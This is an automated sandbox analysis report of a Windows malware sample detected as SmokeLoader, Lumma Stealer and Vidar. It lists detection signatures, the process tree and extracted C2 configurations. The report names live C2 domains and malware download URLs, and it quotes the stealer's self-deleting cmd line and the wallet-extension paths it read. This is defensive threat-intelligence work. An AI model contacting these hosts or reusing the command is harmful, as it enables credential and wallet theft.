Windows Analysis Report
c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe

Overview

General Information

Sample name:c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
Analysis ID:1447731
MD5:a93525f5f13c811e90c56492f5ac934a
SHA1:37fb7a8b8903f4b614cec214f0ff0c69c88a1864
SHA256:1b69a9c37210a79131c5cbcfaa4163fb5027989b4537b43a5a6cf6f40a4bab1a
Tags:exe

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe" MD5: A93525F5F13C811E90C56492F5AC934A)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 21AE.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\21AE.exe MD5: EA9DD1EAE2E521666D3F06382104EC10)
        • WerFault.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • C9A7.exe (PID: 3944 cmdline: C:\Users\user\AppData\Local\Temp\C9A7.exe MD5: 5DEB4442AE617600891949163BB52F0A)
        • katA304.tmp (PID: 1436 cmdline: C:\Users\user\AppData\Local\Temp\katA304.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)
          • cmd.exe (PID: 6128 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7040 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • aarhevh (PID: 5576 cmdline: C:\Users\user\AppData\Roaming\aarhevh MD5: A93525F5F13C811E90C56492F5AC934A)
  • aarhevh (PID: 1988 cmdline: C:\Users\user\AppData\Roaming\aarhevh MD5: A93525F5F13C811E90C56492F5AC934A)
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
  • 0x664:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security |
00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
  • 0x264:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0

Source | Rule | Description | Author | Strings
12.2.C9A7.exe.42a7719.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
12.2.C9A7.exe.42a7719.1.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x201f0:$s1: JohnDoe
  • 0x201e8:$s2: HAL9TH
12.2.C9A7.exe.2590000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
12.2.C9A7.exe.2590000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x201f0:$s1: JohnDoe
  • 0x201e8:$s2: HAL9TH
12.2.C9A7.exe.2590000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

System Summary

Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: C:\Users\user\AppData\Roaming\aarhevh, CommandLine: C:\Users\user\AppData\Roaming\aarhevh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\aarhevh, NewProcessName: C:\Users\user\AppData\Roaming\aarhevh, OriginalFileName: C:\Users\user\AppData\Roaming\aarhevh, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\aarhevh, ProcessId: 5576, ProcessName: aarhevh

AV Detection

Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, Avira: detected
Source: https://whispedwoodmoodsksl.shop/api, Avira URL Cloud: Label: malware
Source: whispedwoodmoodsksl.shop, Avira URL Cloud: Label: malware
Source: http://185.235.137.54/file/host_so.exe, Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/apie, Avira URL Cloud: Label: malware
Source: miniaturefinerninewjs.shop, Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/X, Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe, Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\21AE.exe, Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp
Source: C:\Users\user\AppData\Roaming\aarhevh, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 21AE.exe.5640.5.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
Source: whispedwoodmoodsksl.shop, Virustotal: Detection: 17%
Source: dbfhns.in, Virustotal: Detection: 5%
Source: https://65.109.242.59/, Virustotal: Detection: 7%
Source: http://guteyr.cc/tmp/index.php, Virustotal: Detection: 15%
Source: https://whispedwoodmoodsksl.shop/api, Virustotal: Detection: 17%
Source: whispedwoodmoodsksl.shop, Virustotal: Detection: 17%
Source: http://185.235.137.54/file/host_so.exe, Virustotal: Detection: 19%
Source: https://whispedwoodmoodsksl.shop/apie, Virustotal: Detection: 14%
Source: https://65.109.242.59/l, Virustotal: Detection: 5%
Source: miniaturefinerninewjs.shop, Virustotal: Detection: 19%
Source: obsceneclassyjuwks.shop, Virustotal: Detection: 18%
Source: http://45.129.96.86/file/update.exe, Virustotal: Detection: 20%
Source: https://65.109.242.59/r, Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\21AE.exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\aarhevh, ReversingLabs: Detection: 55%
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, ReversingLabs: Detection: 55%
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, Virustotal: Detection: 59%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\21AE.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\aarhevh, Joe Sandbox ML: detected
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\21AE.exe, Code function: 5_2_0041537E CryptUnprotectData,5_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA4A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,13_2_6CA4A9A0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA444C0 PK11_PubEncrypt,13_2_6CA444C0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA14420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,13_2_6CA14420
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA44440 PK11_PrivDecrypt,13_2_6CA44440
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,13_2_6CA925B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA2E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,13_2_6CA2E6E0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA28670 PK11_ExportEncryptedPrivKeyInfo,13_2_6CA28670
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA4A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,13_2_6CA4A650
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA6A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,13_2_6CA6A730
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA70180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,13_2_6CA70180
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA443B0 PK11_PubEncryptPKCS1,PR_SetError,13_2_6CA443B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA67C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,13_2_6CA67C00
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA6BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,13_2_6CA6BD30
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA27D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,13_2_6CA27D60
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA69EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,13_2_6CA69EC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp, Code function: 13_2_6CA43FF0 PK11_PrivDecryptPKCS1,13_2_6CA43FF0

                  Compliance

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeUnpacked PE file: 5.2.21AE.exe.400000.0.unpack
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49748 version: TLS 1.2
                  Source: Binary string: freebl3.pdb source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
                  Source: Binary string: mozglue.pdbP source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
                  Source: Binary string: freebl3.pdbp source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
                  Source: Binary string: nss3.pdb@ source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.13.dr, vcruntime140[1].dll.13.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.13.dr, msvcp140[1].dll.13.dr
                  Source: Binary string: nss3.pdb source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr
                  Source: Binary string: mozglue.pdb source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                  Networking

                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49711 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49719 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.5:58021 -> 1.1.1.1:53
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49721 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49737 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49739 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49744 -> 187.143.58.5:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49773 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49774 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49775 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49776 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49777 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49778 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49779 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49780 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49781 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49782 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49783 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49784 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49785 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49786 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49787 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49788 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49789 -> 186.112.12.192:80
                  Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49790 -> 186.112.12.192:80
                  Source: C:\Windows\explorer.exe Network Connect: 187.143.58.5 80
                  Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
                  Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
                  Source: C:\Windows\explorer.exe Network Connect: 186.112.12.192 80
                  Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
                  Source: Malware configuration extractor URLs: boredimperissvieos.shop
